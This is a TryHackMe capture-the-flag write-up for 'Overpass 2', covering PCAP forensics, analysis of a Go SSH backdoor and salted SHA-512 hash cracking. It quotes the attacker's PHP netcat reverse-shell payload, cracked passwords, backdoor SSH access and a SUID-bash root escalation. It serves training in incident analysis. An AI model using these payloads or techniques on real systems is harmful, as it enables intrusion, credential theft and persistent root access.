TryHackMe | Overpass 2 — Hacked

edbert sumicad
4 min read, May 1, 2022

Overpass has been hacked! Can you analyze the attacker’s actions and hack back in?

Attack summary:

  • This challenge provides a .pcap file to analyze.
  • Identify where the attackers uploaded their payload.
  • Search the pcap for the script they used as a reverse shell.
  • Identify the password they used to escalate privileges.
  • Identify the persistence mechanism they used.
  • Try to crack the password they generated for it.
  • Use their own backdoor to get the server back with root privileges.

Task 1 Forensics — Analyze the PCAP

  • What was the URL of the page they used to upload a reverse shell?

/development

  • What payload did the attacker use to gain access?

Filter: tcp contains upload

Follow > TCP Stream

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

Analyzing the pcap further.

Filter: tcp contains password

This filter matches a single TCP conversation.

Following this TCP stream reveals a lot of useful information:

  • the password hash and the backdoor they used;
  • the port and the password the attacker generated for it.

  • What password did the attacker use to privesc?

whenevernoteartinstant

  • How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

  • Using the fasttrack wordlist, how many of the system passwords were crackable?

4

john --wordlist=/usr/share/wordlists/fasttrack.txt passwd.hash
abcd123 (szymex)
1qaz2wsx (muirland)
secuirty3 (paradox)
secret12 (bee)

Task 2 Research — Analyse the code

  • What’s the default hash for the backdoor?

Downloading the backdoor script and reading main.go (only the relevant lines are shown; the closing parenthesis ends the import block):

┌──(root💀kali)-[/home/…/Tryhackme/OSCPprep/Overpass2/ssh-backdoor]
└─# cat main.go
)

var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"

func main() {

Default hash

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

  • What’s the hardcoded salt for the backdoor?

This one is also in main.go, where the login check passes the salt as a string literal:

return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)

Hardcoded salt

1c362db832f3f864c8c2fe05f2002a05

  • What was the hash that the attacker used? (go back to the PCAP for this!)

Attacker’s hash

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

  • Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

Analyzing the main.go script shows the format used to generate the hash:

hash := sha512.Sum512([]byte(password + salt))

Format: sha512(password+salt)

Searching the hashcat hash modes for this format gives mode 1710, sha512($pass.$salt):

-m 1710

Save the hash and the hardcoded salt to a file in hash:salt format:

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

Fire up hashcat.

└─# hashcat -m 1710 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

-m 1710 : hash mode (sha512($pass.$salt)).

-a 0 : attack mode, 0 for straight (dictionary) mode.

-o cracked.txt : the file where the cracked password will be saved.

Password: november16
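To confirm the cracking result without hashcat, here is an added Go example (not the backdoor's own code) that reimplements the scheme found in main.go, sha512(password+salt) with the fixed salt, and runs a straight dictionary attack over a constructed mini wordlist. The salt and attacker hash are copied from the writeup; the wordlist is made up.

```go
package main

import (
	"crypto/sha512"
	"encoding/hex"
	"fmt"
)

// Values taken from the writeup: the salt hardcoded in the backdoor's main.go
// and the hash the attacker passed to the backdoor (recovered from the PCAP).
const backdoorSalt = "1c362db832f3f864c8c2fe05f2002a05"
const attackerHash = "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"

// hashPassword reproduces the backdoor's scheme: hex(sha512(password + salt)).
// This is what hashcat calls mode 1710, sha512($pass.$salt).
func hashPassword(password, salt string) string {
	sum := sha512.Sum512([]byte(password + salt))
	return hex.EncodeToString(sum[:])
}

// verifyPass mirrors the backdoor's login check: the candidate is accepted when
// hashing it with the fixed salt yields the stored hash.
func verifyPass(hash, salt, candidate string) bool {
	return hashPassword(candidate, salt) == hash
}

// crack is the offline equivalent of "hashcat -m 1710 -a 0": because the salt is
// public and constant, every wordlist entry costs exactly one SHA-512 to test.
// It returns the matching word and true, or "" and false when nothing matches.
func crack(hash, salt string, wordlist []string) (string, bool) {
	for _, word := range wordlist {
		if verifyPass(hash, salt, word) {
			return word, true
		}
	}
	return "", false
}

func main() {
	// Constructed mini wordlist standing in for rockyou.txt.
	wordlist := []string{"password", "123456", "november16", "letmein"}
	if pw, ok := crack(attackerHash, backdoorSalt, wordlist); ok {
		fmt.Println("cracked:", pw)
	} else {
		fmt.Println("no match in wordlist")
	}
}
```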

Task 3 Attack — Get back in!

Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.

There are flags on the box that Overpass can’t afford to lose by formatting the server!

  • The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

  • Using the information you’ve found previously, hack your way back in!

Log in via SSH using the backdoor port and the cracked password.

└─# ssh -p 2222 james@10.10.251.85

Get the user.txt flag.

james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525***********}

It seems the attacker also left an instant-root script: a SUID copy of bash named .suid_bash.

Execute .suid_bash with the -p option.

-p : privileged mode. Bash normally drops its effective UID back to the real UID when they differ; with -p it keeps the SUID root privileges, so this option gives a root shell without a password.

Comparison: running .suid_bash without -p only gives a shell as james, while with the -p option the shell is root.

Get the root.txt flag.

.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606**********}

Thank you for taking time to read, hope you find this one helpful. :D

If you have any suggestions, feel free to message me on LinkedIn.

edbert sumicad

Cybersecurity Analyst | Penetration Tester | CTF Player